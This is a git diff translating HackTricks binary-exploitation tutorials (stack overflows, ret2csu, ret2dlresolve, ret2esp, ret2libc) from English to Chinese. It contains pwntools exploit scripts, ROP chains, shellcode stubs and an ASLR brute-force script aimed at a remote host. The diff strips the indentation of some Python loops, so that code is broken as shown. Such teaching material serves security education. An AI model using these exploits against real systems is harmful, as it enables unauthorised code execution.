+这个覆盖的主要问题是**保存的指令指针 (EIP/RIP)** 和**保存的基指针 (EBP/RBP)** 用于返回到上一个函数，它们是**存储在栈上的**。因此，攻击者将能够覆盖这些并**控制程序的执行流**。
 
-The vulnerability usually arises because a function **copies inside the stack more bytes than the amount allocated for it**, therefore being able to overwrite other parts of the stack.\
-Some common functions vulnerable to this are: `strcpy`, `strcat`, `sprintf`, `gets`... Also, functions like `fgets` or `read`, that take a length argument, might be used in a vulnerable way if the specified length is greater than the allocated one.
-
-For example, the following functions could be vulnerable:
+该漏洞通常是因为一个函数**在栈中复制的字节数超过了为其分配的数量**，因此能够覆盖栈的其他部分。\
+一些常见的易受攻击的函数包括：`strcpy`、`strcat`、`sprintf`、`gets`... 此外，像`fgets`或`read`这样的函数，如果指定的长度大于分配的长度，可能会以脆弱的方式使用。
 
+例如，以下函数可能是脆弱的：
 ```c
 void vulnerable() {
-    char buffer[128];
-    printf("Enter some text: ");
-    gets(buffer); // This is where the vulnerability lies
-    printf("You entered: %s\n", buffer);
+char buffer[128];
+printf("Enter some text: ");
+gets(buffer); // This is where the vulnerability lies
+printf("You entered: %s\n", buffer);
 }
 ```
+### 寻找栈溢出
 
-### Finding Stack Overflows
+寻找栈溢出的最常见方法是输入非常大的 `A`（例如 `python3 -c 'print("A"*1000)'`），并期待出现 `Segmentation Fault`，这表明 **尝试访问了地址 `0x41414141`**。
 
-The most common way to find stack overflows is to give a very big input of `A`s (e.g. `python3 -c 'print("A"*1000)'`) and expect a `Segmentation Fault` indicating that the **address `0x41414141` was tried to be accessed**.
+此外，一旦发现存在栈溢出漏洞，您需要找到偏移量，以便能够 **覆盖返回地址**，通常使用 **De Bruijn 序列**。对于给定大小为 _k_ 的字母表和长度为 _n_ 的子序列，这是一个 **循环序列，其中每个可能的长度为 **_**n**_** 的子序列恰好出现一次** 作为连续子序列。
 
-Moreover, once you found that there is Stack Overflow vulnerability you will need to find the offset until it's possible to **overwrite the return address**, for this it's usually used a **De Bruijn sequence.** Which for a given alphabet of size _k_ and subsequences of length _n_ is a **cyclic sequence in which every possible subsequence of length **_**n**_** appears exactly once** as a contiguous subsequence.
-
-This way, instead of needing to figure out which offset is needed to control the EIP by hand, it's possible to use as padding one of these sequences and then find the offset of the bytes that ended overwriting it.
-
-It's possible to use **pwntools** for this:
+这样，就不需要手动计算控制 EIP 所需的偏移量，可以使用这些序列中的一个作为填充，然后找到覆盖它的字节的偏移量。
 
+可以使用 **pwntools** 来实现这一点：
 ```python
 from pwn import *
 
@@ -43,34 +40,31 @@ eip_value = p32(0x6161616c)
 offset = cyclic_find(eip_value)  # Finds the offset of the sequence in the De Bruijn pattern
 print(f"The offset is: {offset}")
 ```
-
-or **GEF**:
-
+或 **GEF**：
 ```bash
 #Patterns
 pattern create 200 #Generate length 200 pattern
 pattern search "avaaawaa" #Search for the offset of that substring
 pattern search $rsp #Search the offset given the content of $rsp
 ```
+## 利用栈溢出
 
-## Exploiting Stack Overflows
+在溢出期间（假设溢出大小足够大），您将能够覆盖栈内局部变量的值，直到达到保存的 EBP/RBP 和 EIP/RIP（甚至更多）。\
+滥用这种类型漏洞的最常见方法是 **修改返回地址**，这样当函数结束时，**控制流将被重定向到用户在此指针中指定的地方**。
 
-During an overflow (supposing the overflow size if big enough) you will be able to overwrite values of local variables inside the stack until reaching the saved EBP/RBP and EIP/RIP (or even more).\
-The most common way to abuse this type of vulnerability is by **modifying the return address** so when the function ends the **control flow will be redirected wherever the user specified** in this pointer.
-
-However, in other scenarios maybe just **overwriting some variables values in the stack** might be enough for the exploitation (like in easy CTF challenges).
+然而，在其他场景中，仅仅 **覆盖栈中某些变量的值** 可能就足以进行利用（例如在简单的 CTF 挑战中）。
 
 ### Ret2win
 
-In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/) would be disabled) so when the vulnerable function returns, the hidden function will be called:
+在这种类型的 CTF 挑战中，二进制文件中有一个 **函数** **从未被调用**，而且 **您需要调用它才能获胜**。对于这些挑战，您只需找到 **覆盖返回地址的偏移量** 和 **找到要调用的函数的地址**（通常 [**ASLR**](../common-binary-protections-and-bypasses/aslr/) 会被禁用），这样当易受攻击的函数返回时，隐藏的函数将被调用：
 
 {{#ref}}
 ret2win.md
 {{#endref}}
 
-### Stack Shellcode
+### 栈 Shellcode
 
-In this scenario the attacker could place a shellcode in the stack and abuse the controlled EIP/RIP to jump to the shellcode and execute arbitrary code:
+在这种情况下，攻击者可以将 shellcode 放置在栈中，并利用受控的 EIP/RIP 跳转到 shellcode 并执行任意代码：
 
 {{#ref}}
 stack-shellcode.md
@@ -78,19 +72,18 @@ stack-shellcode.md
 
 ## ROP
 
-This technique is the fundamental framework to bypass the main protection to the previous technique: **No executable stack** (NX). And it allows to perform several other techniques (ret2lib, ret2syscall...) that will end executing arbitrary commands by abusing existing intructions in the binary:
+该技术是绕过前一种技术主要保护的基本框架：**不可执行栈**（NX）。它允许执行其他几种技术（ret2lib, ret2syscall...），最终通过滥用二进制中的现有指令执行任意命令：
 
 {{#ref}}
 rop-return-oriented-programing.md
 {{#endref}}
 
-## Types of protections
+## 保护类型
 
-There are several protections trying to prevent the exploitation of vulnerabilities, check them in:
+有几种保护措施试图防止漏洞的利用，请查看它们：
 
 {{#ref}}
 ../common-binary-protections-and-bypasses/
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/pointer-redirecting.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/pointer-redirecting.md
index 5fb38ad2c..86a687b73 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/pointer-redirecting.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/pointer-redirecting.md
@@ -1,30 +1,29 @@
-# Pointer Redirecting
+# 指针重定向
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## String pointers
+## 字符串指针
 
-If a function call is going to use an address of a string that is located in the stack, it's possible to abuse the buffer overflow to **overwrite this address** and put an **address to a different string** inside the binary.
+如果一个函数调用将使用位于栈中的字符串地址，可以利用缓冲区溢出来**覆盖这个地址**并在二进制文件中放入**指向不同字符串的地址**。
 
-If for example a **`system`** function call is going to **use the address of a string to execute a command**, an attacker could place the **address of a different string in the stack**, **`export PATH=.:$PATH`** and create in the current directory an **script with the name of the first letter of the new string** as this will be executed by the binary.
+例如，如果**`system`**函数调用将**使用字符串的地址来执行命令**，攻击者可以在栈中放置**指向不同字符串的地址**，**`export PATH=.:$PATH`**，并在当前目录中创建一个**以新字符串的首字母命名的脚本**，因为这个脚本将由二进制文件执行。
 
-You can find an example of this in:
+你可以在以下链接找到这个例子：
 
 - [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/strptr.c](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/strptr.c)
 - [https://guyinatuxedo.github.io/04-bof_variable/tw17_justdoit/index.html](https://guyinatuxedo.github.io/04-bof_variable/tw17_justdoit/index.html)
-  - 32bit, change address to flags string in the stack so it's printed bu `puts`
+- 32位，改变栈中指向标志字符串的地址，以便通过`puts`打印
 
-## Function pointers
+## 函数指针
 
-Same as string pointer but applying to functions, if the **stack contains the address of a function** that will be called, it's possible to **change it** (e.g. to call **`system`**).
+与字符串指针相同，但应用于函数，如果**栈中包含将被调用的函数的地址**，则可以**更改它**（例如，调用**`system`**）。
 
-You can find an example in:
+你可以在以下链接找到一个例子：
 
 - [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/funcptr.c](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/funcptr.c)
 
-## References
+## 参考
 
 - [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#pointer-redirecting](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#pointer-redirecting)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md
index 2561b80e4..69f7e9c81 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md
@@ -2,18 +2,17 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-**ret2csu** is a hacking technique used when you're trying to take control of a program but can't find the **gadgets** you usually use to manipulate the program's behavior.&#x20;
+**ret2csu** 是一种黑客技术，当你试图控制一个程序但找不到通常用来操纵程序行为的 **gadgets** 时使用。
 
-When a program uses certain libraries (like libc), it has some built-in functions for managing how different pieces of the program talk to each other. Among these functions are some hidden gems that can act as our missing gadgets, especially one called `__libc_csu_init`.
+当一个程序使用某些库（如 libc）时，它有一些内置函数来管理程序不同部分之间的通信。在这些函数中，有一些隐藏的宝石可以充当我们缺失的 gadgets，特别是一个叫 `__libc_csu_init` 的函数。
 
-### The Magic Gadgets in \_\_libc_csu_init
+### \_\_libc_csu_init 中的魔法 gadgets
 
-In `__libc_csu_init`, there are two sequences of instructions (our "magic gadgets") that stand out:
-
-1. The first sequence lets us set up values in several registers (rbx, rbp, r12, r13, r14, r15). These are like slots where we can store numbers or addresses we want to use later.
+在 `__libc_csu_init` 中，有两个指令序列（我们的“魔法 gadgets”）非常突出：
 
+1. 第一个序列让我们可以在几个寄存器（rbx, rbp, r12, r13, r14, r15）中设置值。这些就像我们可以存储数字或地址的槽，以便稍后使用。
 ```armasm
 pop rbx;
 pop rbp;
@@ -23,31 +22,27 @@ pop r14;
 pop r15;
 ret;
 ```
+这个工具允许我们通过从栈中弹出值来控制这些寄存器。
 
-This gadget allows us to control these registers by popping values off the stack into them.
-
-2. The second sequence uses the values we set up to do a couple of things:
-   - **Move specific values into other registers**, making them ready for us to use as parameters in functions.
-   - **Perform a call to a location** determined by adding together the values in r15 and rbx, then multiplying rbx by 8.
-
+2. 第二个序列使用我们设置的值来做几件事情：
+- **将特定值移动到其他寄存器中**，使它们准备好作为函数中的参数使用。
+- **执行对一个位置的调用**，该位置由将 r15 和 rbx 中的值相加，然后将 rbx 乘以 8 来确定。
 ```
 mov rdx, r14;
 mov rsi, r13;
 mov edi, r12d;
 call qword [r15 + rbx*8];
 ```
+## 示例
 
-## Example
+想象一下，你想要进行一个系统调用或调用一个像 `write()` 的函数，但需要在 `rdx` 和 `rsi` 寄存器中设置特定的值作为参数。通常，你会寻找直接设置这些寄存器的 gadgets，但你找不到任何。
 
-Imagine you want to make a syscall or call a function like `write()` but need specific values in the `rdx` and `rsi` registers as parameters. Normally, you'd look for gadgets that set these registers directly, but you can't find any.
+这就是 **ret2csu** 发挥作用的地方：
 
-Here's where **ret2csu** comes into play:
-
-1. **Set Up the Registers**: Use the first magic gadget to pop values off the stack and into rbx, rbp, r12 (edi), r13 (rsi), r14 (rdx), and r15.
-2. **Use the Second Gadget**: With those registers set, you use the second gadget. This lets you move your chosen values into `rdx` and `rsi` (from r14 and r13, respectively), readying parameters for a function call. Moreover, by controlling `r15` and `rbx`, you can make the program call a function located at the address you calculate and place into `[r15 + rbx*8]`.
-
-You have an [**example using this technique and explaining it here**](https://ir0nstone.gitbook.io/notes/types/stack/ret2csu/exploitation), and this is the final exploit it used:
+1. **设置寄存器**：使用第一个魔法 gadget 从栈中弹出值并放入 rbx, rbp, r12 (edi), r13 (rsi), r14 (rdx) 和 r15。
+2. **使用第二个 gadget**：在这些寄存器设置好后，你使用第二个 gadget。这让你可以将选择的值移动到 `rdx` 和 `rsi`（分别来自 r14 和 r13），为函数调用准备参数。此外，通过控制 `r15` 和 `rbx`，你可以使程序调用位于你计算并放入 `[r15 + rbx*8]` 地址的函数。
 
+你有一个 [**使用此技术并在此处解释的示例**](https://ir0nstone.gitbook.io/notes/types/stack/ret2csu/exploitation)，这是它使用的最终利用：
 ```python
 from pwn import *
 
@@ -71,13 +66,11 @@ p.sendlineafter('me\n', rop.chain())
 p.sendline(p64(elf.sym['win']))            # send to gets() so it's written
 print(p.recvline())                        # should receive "Awesome work!"
 ```
-
 > [!WARNING]
-> Note that the previous exploit isn't meant to do a **`RCE`**, it's meant to just call a function called `win` (taking the address of `win` from stdin calling gets in the ROP chain and storing it in r15) with a third argument with the value `0xdeadbeefcafed00d`.
+> 请注意，之前的漏洞并不是为了实现 **`RCE`**，而只是为了调用一个名为 `win` 的函数（从 stdin 调用 gets 获取 `win` 的地址并将其存储在 r15 中），并带有一个值为 `0xdeadbeefcafed00d` 的第三个参数。
 
-### Why Not Just Use libc Directly?
+### 为什么不直接使用 libc？
 
-Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protections-and-bypasses/aslr/ret2plt.md) + [**ret2lib**](ret2lib/), but sometimes you need to control more parameters than are easily controlled with the gadgets you find directly in libc. For example, the `write()` function requires three parameters, and **finding gadgets to set all these directly might not be possible**.
+通常这些情况也容易受到 [**ret2plt**](../common-binary-protections-and-bypasses/aslr/ret2plt.md) + [**ret2lib**](ret2lib/) 的攻击，但有时你需要控制的参数比在 libc 中直接找到的 gadgets 更多。例如，`write()` 函数需要三个参数，而 **直接找到设置所有这些的 gadgets 可能是不可能的**。
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md
index 874110244..aae843858 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md
@@ -2,39 +2,38 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-As explained in the page about [**GOT/PLT**](../arbitrary-write-2-exec/aw2exec-got-plt.md) and [**Relro**](../common-binary-protections-and-bypasses/relro.md), binaries without Full Relro will resolve symbols (like addresses to external libraries) the first time they are used. This resolution occurs calling the function **`_dl_runtime_resolve`**.
+正如在关于 [**GOT/PLT**](../arbitrary-write-2-exec/aw2exec-got-plt.md) 和 [**Relro**](../common-binary-protections-and-bypasses/relro.md) 的页面中所解释的，缺少完整 Relro 的二进制文件在第一次使用时会解析符号（如外部库的地址）。这个解析过程是通过调用函数 **`_dl_runtime_resolve`** 来完成的。
 
-The **`_dl_runtime_resolve`** function takes from the stack references to some structures it needs in order to resolve the specified symbol.
+**`_dl_runtime_resolve`** 函数从栈中获取一些结构的引用，以便解析指定的符号。
 
-Therefore, it's possible to **fake all these structures** to make the dynamic linked resolving the requested symbol (like **`system`** function) and call it with a configured parameter (e.g. **`system('/bin/sh')`**).
+因此，可以 **伪造所有这些结构** 以使动态链接解析请求的符号（如 **`system`** 函数），并使用配置的参数调用它（例如 **`system('/bin/sh')`**）。
 
-Usually, all these structures are faked by making an **initial ROP chain that calls `read`** over a writable memory, then the **structures** and the string **`'/bin/sh'`** are passed so they are stored by read in a known location, and then the ROP chain continues by calling **`_dl_runtime_resolve`** with the address to `$'/bin/sh'`.
+通常，通过制作一个 **初始 ROP 链来调用 `read`** 在可写内存上伪造所有这些结构，然后将 **结构** 和字符串 **`'/bin/sh'`** 传递，以便它们被 `read` 存储在已知位置，然后 ROP 链继续通过调用 **`_dl_runtime_resolve`**，并传递 `$'/bin/sh'` 的地址。
 
 > [!TIP]
-> This technique is useful specially if there aren't syscall gadgets (to use techniques such as [**ret2syscall**](rop-syscall-execv.md) or [SROP](srop-sigreturn-oriented-programming.md)) and there are't ways to leak libc addresses.
+> 如果没有 syscall gadgets（以使用诸如 [**ret2syscall**](rop-syscall-execv.md) 或 [SROP](srop-sigreturn-oriented-programming.md) 的技术），并且没有方法泄漏 libc 地址，这种技术特别有用。
 
-You can find a better explanation about this technique in the second half of the video:
+您可以在视频的后半部分找到关于此技术的更好解释：
 
 {% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %}
 
-## Structures
+## 结构
 
-It's necessary to fake 3 structures: **`JMPREL`**, **`STRTAB`** and **`SYMTAB`**. You have a better explanation about how these are built in [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures)
+需要伪造 3 个结构：**`JMPREL`**、**`STRTAB`** 和 **`SYMTAB`**。您可以在 [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures) 找到关于这些结构如何构建的更好解释。
 
-## Attack Summary
+## 攻击总结
 
-1. Write fake estructures in some place
-2. Set the first argument of system (`$rdi = &'/bin/sh'`)
-3. Set on the stack the addresses to the structures to call **`_dl_runtime_resolve`**
-4. **Call** `_dl_runtime_resolve`
-5. **`system`** will be resolved and called with `'/bin/sh'` as argument
+1. 在某个地方写入伪造的结构
+2. 设置 system 的第一个参数 (`$rdi = &'/bin/sh'`)
+3. 在栈上设置结构的地址以调用 **`_dl_runtime_resolve`**
+4. **调用** `_dl_runtime_resolve`
+5. **`system`** 将被解析并以 `'/bin/sh'` 作为参数调用
 
-## Example
-
-You can find an [**example of this technique here**](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve/exploitation) **containing a very good explanation of the final ROP chain**, but here is the final exploit used:
+## 示例
 
+您可以在 [**这里找到此技术的示例**](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve/exploitation) **包含最终 ROP 链的非常好解释**，但这里是使用的最终利用代码：
 ```python
 from pwn import *
 
@@ -56,11 +55,9 @@ p.sendline(dlresolve.payload)    # now the read is called and we pass all the re
 
 p.interactive()
 ```
-
-## References
+## 参考
 
 - [https://youtu.be/ADULSwnQs-s](https://youtu.be/ADULSwnQs-s?feature=shared)
 - [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md
index bcc05b476..82e24081b 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md
@@ -4,27 +4,24 @@
 
 ## **Ret2esp**
 
-**Because the ESP (Stack Pointer) always points to the top of the stack**, this technique involves replacing the EIP (Instruction Pointer) with the address of a **`jmp esp`** or **`call esp`** instruction. By doing this, the shellcode is placed right after the overwritten EIP. When the `ret` instruction executes, ESP points to the next address, precisely where the shellcode is stored.
+**因为 ESP（栈指针）始终指向栈的顶部**，该技术涉及用 **`jmp esp`** 或 **`call esp`** 指令的地址替换 EIP（指令指针）。通过这样做，shellcode 被放置在被覆盖的 EIP 之后。当 `ret` 指令执行时，ESP 指向下一个地址，正好是存储 shellcode 的地方。
 
-If **Address Space Layout Randomization (ASLR)** is not enabled in Windows or Linux, it's possible to use `jmp esp` or `call esp` instructions found in shared libraries. However, with [**ASLR**](../common-binary-protections-and-bypasses/aslr/) active, one might need to look within the vulnerable program itself for these instructions (and you might need to defeat [**PIE**](../common-binary-protections-and-bypasses/pie/)).
+如果 **地址空间布局随机化（ASLR）** 在 Windows 或 Linux 中未启用，可以使用在共享库中找到的 `jmp esp` 或 `call esp` 指令。然而，当 [**ASLR**](../common-binary-protections-and-bypasses/aslr/) 激活时，可能需要在易受攻击的程序内部查找这些指令（并且可能需要击败 [**PIE**](../common-binary-protections-and-bypasses/pie/)）。
 
-Moreover, being able to place the shellcode **after the EIP corruption**, rather than in the middle of the stack, ensures that any `push` or `pop` instructions executed during the function's operation don't interfere with the shellcode. This interference could happen if the shellcode were placed in the middle of the function's stack.
+此外，能够将 shellcode **放置在 EIP 损坏之后**，而不是在栈的中间，确保在函数操作期间执行的任何 `push` 或 `pop` 指令不会干扰 shellcode。如果 shellcode 被放置在函数栈的中间，可能会发生这种干扰。
 
-### Lacking space
-
-If you are lacking space to write after overwriting RIP (maybe just a few bytes), write an initial `jmp` shellcode like:
+### 缺少空间
 
+如果在覆盖 RIP 之后缺少写入空间（可能只有几个字节），可以写一个初始的 `jmp` shellcode，如：
 ```armasm
 sub rsp, 0x30
 jmp rsp
 ```
+在栈中早期写入 shellcode。
 
-And write the shellcode early in the stack.
-
-### Example
-
-You can find an example of this technique in [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp) with a final exploit like:
+### 示例
 
+您可以在 [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp) 中找到此技术的示例，最终利用如下：
 ```python
 from pwn import *
 
@@ -36,32 +33,30 @@ jmp_rsp = next(elf.search(asm('jmp rsp')))
 payload = b'A' * 120
 payload += p64(jmp_rsp)
 payload += asm('''
-    sub rsp, 10;
-    jmp rsp;
+sub rsp, 10;
+jmp rsp;
 ''')
 
 pause()
 p.sendlineafter('RSP!\n', payload)
 p.interactive()
 ```
-
 ## Ret2reg
 
-Similarly, if we know a function returns the address where the shellcode is stored, we can leverage **`call eax`** or **`jmp eax`** instructions (known as **ret2eax** technique), offering another method to execute our shellcode. Just like eax, **any other register** containing an interesting address could be used (**ret2reg**).
+类似地，如果我们知道一个函数返回存储 shellcode 的地址，我们可以利用 **`call eax`** 或 **`jmp eax`** 指令（称为 **ret2eax** 技术），提供另一种执行我们的 shellcode 的方法。就像 eax 一样，**任何其他寄存器** 中包含有趣地址的寄存器都可以被使用（**ret2reg**）。
 
-### Example
+### 示例
 
-You can find an example here: [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/ret2reg/using-ret2reg](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/ret2reg/using-ret2reg)
+您可以在这里找到一个示例：[https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/ret2reg/using-ret2reg](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/ret2reg/using-ret2reg)
 
-## Protections
+## 保护措施
 
-- [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md): If the stack isn't executable this won't help as we need to place the shellcode in the stack and jump to execute it.
-- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) & [**PIE**](../common-binary-protections-and-bypasses/pie/): Those can make harder to find a instruction to jump to esp or any other register.
+- [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md)：如果栈不可执行，这将无济于事，因为我们需要将 shellcode 放在栈中并跳转以执行它。
+- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) 和 [**PIE**](../common-binary-protections-and-bypasses/pie/)：这些可能会使找到跳转到 esp 或任何其他寄存器的指令变得更加困难。
 
-## References
+## 参考
 
 - [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode)
 - [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md
index 4b92b59f2..2e330007b 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md
@@ -2,86 +2,74 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## **Basic Information**
+## **基本信息**
 
-The essence of **Ret2Libc** is to redirect the execution flow of a vulnerable program to a function within a shared library (e.g., **system**, **execve**, **strcpy**) instead of executing attacker-supplied shellcode on the stack. The attacker crafts a payload that modifies the return address on the stack to point to the desired library function, while also arranging for any necessary arguments to be correctly set up according to the calling convention.
+**Ret2Libc** 的本质是将易受攻击程序的执行流程重定向到共享库中的一个函数（例如，**system**、**execve**、**strcpy**），而不是在栈上执行攻击者提供的 shellcode。攻击者构造一个有效载荷，修改栈上的返回地址，使其指向所需的库函数，同时确保根据调用约定正确设置任何必要的参数。
 
-### **Example Steps (simplified)**
+### **示例步骤（简化）**
 
-- Get the address of the function to call (e.g. system) and the command to call (e.g. /bin/sh)
-- Generate a ROP chain to pass the first argument pointing to the command string and the execution flow to the function
+- 获取要调用的函数的地址（例如 system）和要调用的命令（例如 /bin/sh）
+- 生成一个 ROP 链，以将第一个参数传递给指向命令字符串的函数，并将执行流程传递给该函数
 
-## Finding the addresses
-
-- Supposing that the `libc` used is the one from current machine you can find where it'll be loaded in memory with:
+## 查找地址
 
+- 假设使用的 `libc` 是当前机器上的，可以使用以下命令找到它在内存中的加载位置：
 ```bash
 ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time)
 ```
-
-If you want to check if the ASLR is changing the address of libc you can do:
-
+如果您想检查 ASLR 是否在更改 libc 的地址，您可以执行：
 ```bash
 for i in `seq 0 20`; do ldd ./<bin> | grep libc; done
 ```
-
-- Knowing the libc used it's also possible to find the offset to the `system` function with:
-
+- 知道使用的libc后，也可以通过以下方式找到`system`函数的偏移量：
 ```bash
 readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
 ```
-
-- Knowing the libc used it's also possible to find the offset to the string `/bin/sh` function with:
-
+- 知道使用的libc后，也可以找到字符串`/bin/sh`函数的偏移量：
 ```bash
 strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
 ```
+### 使用 gdb-peda / GEF
 
-### Using gdb-peda / GEF
-
-Knowing the libc used, It's also possible to use Peda or GEF to get address of **system** function, of **exit** function and of the string **`/bin/sh`** :
-
+知道使用的 libc 后，也可以使用 Peda 或 GEF 获取 **system** 函数、**exit** 函数和字符串 **`/bin/sh`** 的地址：
 ```
 p system
 p exit
 find "/bin/sh"
 ```
+### 使用 /proc/\<PID>/maps
 
-### Using /proc/\<PID>/maps
+如果该进程在每次与其交互时都在创建**子进程**（网络服务器），请尝试**读取**该文件（可能需要以root身份运行）。
 
-If the process is creating **children** every time you talk with it (network server) try to **read** that file (probably you will need to be root).
-
-Here you can find **exactly where is the libc loaded** inside the process and **where is going to be loaded** for every children of the process.
+在这里你可以找到**libc加载的确切位置**以及**每个子进程将要加载的位置**。
 
 ![](<../../../../images/image (95).png>)
 
-In this case it is loaded in **0xb75dc000** (This will be the base address of libc)
+在这种情况下，它加载在**0xb75dc000**（这将是libc的基地址）
 
-## Unknown libc
+## 未知的libc
 
-It might be possible that you **don't know the libc the binary is loading** (because it might be located in a server where you don't have any access). In that case you could abuse the vulnerability to **leak some addresses and find which libc** library is being used:
+可能你**不知道二进制文件加载的libc**（因为它可能位于你无法访问的服务器上）。在这种情况下，你可以利用漏洞**泄露一些地址并找出使用的libc**库：
 
 {{#ref}}
 rop-leaking-libc-address/
 {{#endref}}
 
-And you can find a pwntools template for this in:
+你可以在这里找到一个pwntools模板：
 
 {{#ref}}
 rop-leaking-libc-address/rop-leaking-libc-template.md
 {{#endref}}
 
-## Bypassing ASLR in 32 bits
+## 绕过32位的ASLR
 
-These brute-forcing attacks are **only useful for 32bit systems**.
-
-- If the exploit is local, you can try to brute-force the base address of libc (useful for 32bit systems):
+这些暴力攻击**仅对32位系统有用**。
 
+- 如果利用是本地的，你可以尝试暴力破解libc的基地址（对32位系统有用）：
 ```python
 for off in range(0xb7000000, 0xb8000000, 0x1000):
 ```
-
-- If attacking a remote server, you could try to **burte-force the address of the `libc` function `usleep`**, passing as argument 10 (for example). If at some point the **server takes 10s extra to respond**, you found the address of this function.
+- 如果攻击远程服务器，您可以尝试**暴力破解 `libc` 函数 `usleep` 的地址**，传递参数 10（例如）。如果在某个时刻**服务器响应多了 10 秒**，您就找到了这个函数的地址。
 
 ## One Gadget
 
@@ -89,10 +77,9 @@ for off in range(0xb7000000, 0xb8000000, 0x1000):
 ../../one-gadget.md
 {{#endref}}
 
-## x86 Ret2lib Code Example
-
-In this example ASLR brute-force is integrated in the code and the vulnerable binary is loated in a remote server:
+## x86 Ret2lib 代码示例
 
+在这个示例中，ASLR 暴力破解集成在代码中，易受攻击的二进制文件位于远程服务器上：
 ```python
 from pwn import *
 
@@ -100,45 +87,43 @@ c = remote('192.168.85.181',20002)
 c.recvline()
 
 for off in range(0xb7000000, 0xb8000000, 0x1000):
-    p = ""
-    p += p32(off + 0x0003cb20) #system
-    p += "CCCC" #GARBAGE, could be address of exit()
-    p += p32(off + 0x001388da) #/bin/sh
-    payload = 'A'*0x20010 + p
-    c.send(payload)
-    c.interactive()
+p = ""
+p += p32(off + 0x0003cb20) #system
+p += "CCCC" #GARBAGE, could be address of exit()
+p += p32(off + 0x001388da) #/bin/sh
+payload = 'A'*0x20010 + p
+c.send(payload)
+c.interactive()
 ```
+## x64 Ret2lib 代码示例
 
-## x64 Ret2lib Code Example
